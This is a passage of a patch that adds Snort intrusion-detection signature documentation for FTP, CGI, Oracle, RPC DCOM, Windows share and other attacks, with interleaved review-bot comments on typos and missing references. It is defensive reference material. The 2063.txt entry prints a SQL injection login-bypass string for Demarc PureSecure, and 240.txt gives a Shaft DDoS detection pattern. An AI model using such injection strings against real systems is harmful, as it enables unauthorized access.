+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
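Review bot: fix "ona web server" to "on a web server" in Detailed Information, and rewrap the overlong line "relationships between the victim server and other hosts can be exploited by the attacker." to the column width used by the rest of the file. The document is otherwise generic; nothing says what request or content rule 808 matches, so add that to the Summary.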
--- /dev/null
+++ b/doc/signatures/547.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+547
+
+--
+Summary: 
+This event is generated when an attempt is made to create a directory name that begins with a space on an FTP server.
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to create a directory name that begins with a space on an FTP server, possibly in preparation to store unauthorized files.
+
+
+--
+Detailed Information: 
+An attacker may attempt to create a hidden directory name that begins with a space on an FTP server .  This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to create a hidden directory name that begins with a space to store unauthorized files.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+None Known.
+
+--
+False Negatives: 
+Hidden directories other than those with a name that begins with a space may be created to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
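Review bot: stray space before the period in Detailed Information ("on an FTP server ."). The Summary should name the FTP command involved (MKD, the directory-creation command) since that is what the rule inspects. Corrective Action "Assign restrictive permissions to all directories" would be more useful as "do not allow anonymous or untrusted users write access to the FTP tree", which is the condition that makes the hidden directory worth creating.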
--- /dev/null
+++ b/doc/signatures/100000342.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000342
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DoceboLMS" application running on a webserver. Access to the file "business.php" using a remote file being passed as the "lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang" parameter in the "business.php" script used by the "DoceboLMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DoceboLMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1185.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1185
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
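Review bot: this file is word for word the same as 808.txt earlier in this patch, so nothing documents what distinguishes rule 1185 from rule 808; add the matched request or content to the Summary of each. Fix "ona web server" to "on a web server" and rewrap the overlong line "relationships between the victim server and other hosts can be exploited by the attacker." as in the rest of the file.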
--- /dev/null
+++ b/doc/signatures/240.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+240
+
+--
+Summary:
+This event is generated when a DDoS Shaft agent communicates with a Shaft handler.  It is also possible that this event may be generated when any host attempts to discover a Shaft handler.   
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft agent or a host attempting to discover Shaft handlers.  If the listed destination IP is in your network, it may be a Shaft handler.
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Handlers communicate with agents to direct them to launch attacks. An agent may communicate with a handler using a UDP packet to destination port 20433 with a content of "alive".
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft agent needs to communicate with a handler before it is given directions to launch an attack. 
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS256
+
+Miscellaneous:
+http://biocserver.cwru.edu/~jose/shaft_analysis/
+
+
+--
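Review bot: trailing whitespace on the Summary line ("... discover a Shaft handler.   ") and the Attack Scenarios line ("... launch an attack. "), plus the doubled blank lines before the "--" separators after Corrective Action and after the Miscellaneous reference, should be trimmed to match the other files. Detailed Information already gives the concrete match (UDP to destination port 20433 with content "alive"); it would help the Impact section to say that the alert fires on the agent's outbound packet, which is what makes "source IP in your network" the agent case.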
--- /dev/null
+++ b/doc/signatures/345.txt
@@ -0,0 +1,60 @@
+SID:
+345
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
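Review bot: section layout differs from every other file in this patch: SID comes before Rule, the "--" separators precede the blank line instead of following it, and the final section is titled "References:" rather than "Additional References:"; reorder to the common template. Also fix "wu-ftpd 2.6 .0" to "2.6.0", "over writing" to "overwriting", and "Simple, Exploits exist" to "Simple. Exploits exist.", and reword the Corrective Action aside "Maybe even get rid of wu-ftp with something more secure" as a recommendation (replace wu-ftpd with an actively maintained FTP daemon). References is empty; the SITE EXEC format string issue has CVE and Bugtraq entries that should be listed.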
--- /dev/null
+++ b/doc/signatures/1629.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1629
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+IDS system on the protected network is detected.
+
+--
+Impact:
+These tools may be used to compromise data on the network or may
+indicate mis-use of other IDS systems.
+
+--
+Detailed Information:
+This event indicates the use of an IDS tool. The source of the event
+should be investigated carefully. These tools may be used to gather data
+present in traffic on the protected network.
+
+--
+Affected Systems:
+	All networks.
+
+--
+Attack Scenarios:
+An unathorized user could use an IDS to gather data and observe traffic
+present on the network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
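Review bot: the Corrective Action section is empty; it should at least direct the analyst to identify the source host and confirm whether the sensor is authorized (Detailed Information already says the source "should be investigated carefully", which belongs here). Typo "unathorized" in Attack Scenarios; "IDS system" is redundant ("IDS" alone, or "intrusion detection system").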
--- /dev/null
+++ b/doc/signatures/1864.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1864
+
+--
+Summary:
+This event is generated when an attempt is made to enter the "SITE 
+NEWER" command on an FTP server.
+
+--
+Impact:
+Denial of Service. Possible execution of arbitrary code is possible.
+
+--
+Detailed Information:
+When issued the "SITE NEWER" command, some versions of wu-ftpd can 
+consume excessive ammounts of memory whichthen can effectively act as a 
+denial of service to the entire system. If a user can create files on 
+the system, it may be possible to execute code as the user running the 
+ftpd daemon, typically root.
+
+--
+Affected Systems:
+	wu-ftpd versions prior to and including 2.4.2.
+
+--
+Attack Scenarios:
+An attacker might be trying to DoS the system, and it could lead to 
+arbitrary code execution with root privileges.
+
+--
+Ease of Attack:
+Medium
+
+--
+False Positives:
+This can lead to false positives if the ftp service is not wu-ftpd or if
+wu-ftpd is greater than version 2.4.2
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the wu-ftpd service
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+
+--
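Review bot: Impact "Denial of Service. Possible execution of arbitrary code is possible." repeats "possible"; reword to "Denial of Service. Possible execution of arbitrary code." Detailed Information has "ammounts" and "whichthen" (should be "amounts" and "which then"). The separator after Contributors carries trailing whitespace ("-- "), and Additional References is empty for a vulnerability with a stated affected range (wu-ftpd 2.4.2 and earlier), so a vendor or Bugtraq reference should be added.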
--- /dev/null
+++ b/doc/signatures/2645.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2645
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_offline" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
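Review bot: "a Oracle database implementation" should be "an Oracle database implementation", and "logon" as a verb should be "log on". The paragraph telling the reader to set $ORACLE_PORTS to "any" on Windows is a Snort variable configuration note, not part of the vulnerability description; label it as such or move it to Corrective Action so it is not mistaken for an Oracle setting. Affected Systems is indented with spaces where the other files use a tab.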
--- /dev/null
+++ b/doc/signatures/1960.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1960
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nfsd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nfsd is using.  Attackers can also learn what versions of the nfsd protocol are accepted by nfsd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nfsd run.  The nfsd RPC service starts the Network File System (NFS) server daemon that handles file system requests from clients. Once a client mounts an NFS file system, the nfsd daemon handles access to the mount point and associated directories.  Several vulnerabilities are associated with nfsd.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nfsd runs.  This may be a precursor to accessing nfsd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nfsd, not probes of the nfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nfsd service itself. An attacker may attempt to go directly to the nfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
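Review bot: Detailed Information states "Several vulnerabilities are associated with nfsd" but Additional References is empty; either list the references or drop the claim. Trailing whitespace on the Impact, Ease of Attack and Corrective Action lines, the extra blank line after Summary, and the double spaces between sentences should be normalized, and "Easy." in Ease of Attack should be "Simple." to match the other files.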
--- /dev/null
+++ b/doc/signatures/903.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+903
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
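Review bot: the product is spelled "ColdFusion" in Summary and Affected Systems but "Coldfusion" in Detailed Information; use one spelling. "attackers choosing" in Impact needs the possessive. Additional References is empty even though Ease of Attack says "Many exploits exist"; at least one vendor advisory should be cited.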
--- /dev/null
+++ b/doc/signatures/2142.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2142
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the php application shoutbox. 
+
+--
+Impact:
+Information gathering possible execution of arbitrary code and remote access to the host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the php application shoutbox. Shoutbox contains a flaw that can allow an attacker to perform a directory traversal.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the host. The attacker might then gain administrator access to the host or execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
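Review bot: Affected Systems "Any host using php." is too broad for a rule whose Summary names a single application; it should read "Any host running the Shoutbox PHP application". "Sid: 2142" puts the value on the heading line unlike the other files, the Impact line lacks punctuation ("Information gathering. Possible execution of arbitrary code and remote access to the host."), and "php" should be capitalized as "PHP". Additional References is empty and there are two blank lines before the closing separator.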
--- /dev/null
+++ b/doc/signatures/2063.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2063
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Demarc PureSecure.
+
+--
+Impact:
+Administrative control of the Demarc PureSecure IDS, Information 
+disclosure
+
+--
+Detailed Information:
+Demarc PureSecure is a Snort based Intrusion Detection System. A 
+vulnerability exists where an attacker can bypass login authorization 
+using SQL injection.
+
+Versions of Demarc PureSecure up to 1.6 suffer from poor authentication 
+methods, where input in the form of specially constructed SQL queries 
+can allow an attacker to gain administrative access to the IDS.
+
+--
+Affected Systems:
+Demarc PureSecure prior to version 1.6
+
+--
+Attack Scenarios:
+The attacker needs to send specially constructed SQL queries directly to
+the Demarc login page.
+
+For example, the attacker might send his own variables for the session 
+id or session key in a query s_key=' OR current_session_id LIKE '%' the 
+attacker would of course, need to convert spaces to their encoded 
+equivalents and escape special characters.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/4520
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0539
+
+--
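Review bot: the version range is inconsistent: Detailed Information says "Versions of Demarc PureSecure up to 1.6 suffer from poor authentication" while Affected Systems says "prior to version 1.6"; state clearly whether 1.6 itself is affected, since that decides whether an analyst can close the alert on a 1.6 install. The reference labels "Bugtraq" and "CVE" lack the trailing colon used elsewhere in this patch ("Arachnids:", "Microsoft:").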
--- /dev/null
+++ b/doc/signatures/533.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+533
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
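Review bot: Corrective Action names only TCP port 139, but SMB is also reachable directly over TCP port 445 (the 3419.txt entry in this same patch already lists "135, 139 and 445"); add 445 so the mitigation is complete. The separator after Contributors has trailing whitespace ("-- ").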
--- /dev/null
+++ b/doc/signatures/3419.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3419
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
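Review bot: typo "Expoit code exists" in Ease of Attack. Attack Scenarios describes "a request for a file with an overly long filename via a network share", which is more specific than the "malformed request to an RPC port" in Detailed Information; the two should agree on what the rule actually matches. Additional References is empty for a vulnerability that has a vendor bulletin. Note also that 3259.txt later in this patch carries text identical to this file; if the two rules differ, each doc should say how.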
--- /dev/null
+++ b/doc/signatures/680.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
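Review bot: the Sid value is missing ("Sid: " with nothing following); the file name gives it as 680. The Affected Systems section is absent entirely. In Detailed Information the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell ..." appears carried over from a telnet signature and does not fit an SQL command rule; remove or reword it. Attack Scenarios ("Simple. These are SQL database commands.") duplicates Ease of Attack and should describe a scenario instead. Several "-- " separators carry trailing whitespace.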
--- /dev/null
+++ b/doc/signatures/1050.txt
@@ -0,0 +1,53 @@
+Rule:
+--
+Sid:
+1050
+--
+Summary:
+This event is generated when a request is made to a webserver using the 
+the command 'GETPROPERTIES'. This may be an indication that a buffer 
+overflow attack may be in process.
+--
+Impact:
+If successful, this attack will allow attackers to run code of their 
+choosing on the victim server.
+--
+Detailed Information:
+The web publishing feature in iPlanet Web Server 4.1 is vulnerable to a 
+buffer overflow.
+--
+Affected Systems:
+iPlanet Web Server 4.1 up to Service Pack 8
+--
+Attack Scenarios:
+An attacker can spawn a remote shell on the server and execute any 
+command they desire.
+--
+Ease of Attack:
+Difficult.  Exploit code does not appear to exist as of June 2003, so an
+attacker would need to write the code themselves.
+--
+False Positives:
+Legimate uses of web publishing.
+--
+False Negatives:
+This vulnerability can be exploited using any number of web publishing 
+commands, however this rule only generates an event on one specific 
+command (GETPROPERTIES).
+--
+Corrective Action:
+Disable web publishing or upgrade your web server software.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen <kevin.peuhkurinen@hepcoe.com>
+
+-- 
+Additional References:
+
+NTBugtraq Archive:
+http://archives.neohapsis.com/archives/ntbugtraq/2001-q2/0035.html
+
+--
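Review bot: doubled word "using the the command 'GETPROPERTIES'" in Summary; "Legimate" in False Positives should be "Legitimate". This file omits the blank line before each "--" separator that the other files use. The False Negatives note that only one of several web publishing commands is matched is useful and should stay.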
--- /dev/null
+++ b/doc/signatures/100000340.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000340
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "V-Webmail" application running on a webserver. Access to the file "pop3.php" using a remote file being passed as the "CONFIG[pear_dir]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CONFIG[pear_dir]" parameter in the "pop3.php" script used by the "V-Webmail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using V-Webmail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2474.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2474
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
